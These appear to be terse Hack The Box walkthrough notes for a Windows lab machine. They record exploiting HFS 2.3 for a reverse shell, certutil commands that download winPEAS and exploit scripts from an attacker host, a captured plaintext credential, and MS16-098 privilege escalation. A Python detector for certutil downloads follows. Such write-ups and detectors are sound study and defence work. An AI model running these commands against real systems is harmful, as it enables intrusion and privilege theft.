- URL : https://app.hackthebox.eu/machines/6
- IP : 10.129.209.84
Information Gathering
- Port scan
Inspect port 80
- HFS 2.3
Finding an Exploit
- Found https://www.exploit-db.com/exploits/39161
- Need to prepare nc
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
Start an HTTP server as required
- python3 -m http.server 80
- Place nc there
Run the script
Received the reverse shell
Got the User flag
Privilege Escalation
systeminfo
Download winPEAS
- certutil -urlcache -f http://10.10.16.35:8000/winPEASx64.exe winpeas.exe
Run winPEAS

- Found credentials
kostas kdeEjDowkS*
Use Windows-Exploit-Suggester
- https://github.com/AonCyberLabs/Windows-Exploit-Suggester
- The specified version of xlrd has to be installed first
pip install xlrd==1.2.0
./windows-exploit-suggester.py --update
- Look through the recommended exploit scripts
Try MS16-032
- wget https://www.exploit-db.com/download/39719 -O Invoke-MS16-032.ps1
- Download the script
certutil -urlcache -f http://10.10.16.35/Invoke-MS16-032.ps1 Invoke-MS16-032.ps1
Failed
- https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html
- Apparently because it is meant for GUI use and needs to pop up an extra window
Try MS16-098
- https://github.com/sensepost/ms16-098
- Download it and run it

- Successfully got the System flag
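
Detection side of the two certutil downloads above, as an added example that is not part of the original write-up: a Python check that flags `certutil -urlcache` commands carrying a URL in process-creation logs. The sample command lines are constructed (the first two mirror the commands in these notes), and the function names `detect_certutil_download` and `scan` are hypothetical.

```python
import re
import shlex

# Constructed sample command lines, as they would appear in process-creation
# logs (Security 4688 / Sysmon 1). The first two mirror this write-up.
SAMPLE_CMDLINES = [
    "certutil -urlcache -f http://10.10.16.35:8000/winPEASx64.exe winpeas.exe",
    "CertUtil.exe /URLCache /f http://10.10.16.35/Invoke-MS16-032.ps1 Invoke-MS16-032.ps1",
    r'"C:\Windows\System32\certutil.exe" -hashfile C:\Users\Public\setup.msi SHA256',
    "certutil -urlcache *",  # lists cache entries, downloads nothing
    "systeminfo",
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def detect_certutil_download(cmdline):
    """Return {'url', 'outfile'} for a certutil URL-cache download, else None."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = cmdline.split()
    if not tokens:
        return None
    # Compare the image name only, with or without a path or ".exe".
    image = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    args = [t.strip('"') for t in tokens[1:]]
    # certutil takes "-" or "/" as option prefix and ignores option case.
    opts = {a[1:].lower() for a in args if a[:1] in ("-", "/")}
    positional = [a for a in args if a[:1] not in ("-", "/")]
    urls = [a for a in positional if URL_RE.match(a)]
    if "urlcache" not in opts or not urls:
        return None
    after = positional[positional.index(urls[0]) + 1:]
    return {"url": urls[0], "outfile": after[0] if after else None}


def scan(cmdlines):
    """Return (cmdline, finding) pairs for every line that matches."""
    findings = ((c, detect_certutil_download(c)) for c in cmdlines)
    return [(c, f) for c, f in findings if f]


if __name__ == "__main__":
    for cmdline, finding in scan(SAMPLE_CMDLINES):
        print(f"ALERT url={finding['url']} outfile={finding['outfile']}")
```

The cache listing and the `-hashfile` call are not flagged because the rule needs both the `urlcache` option and a URL argument.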
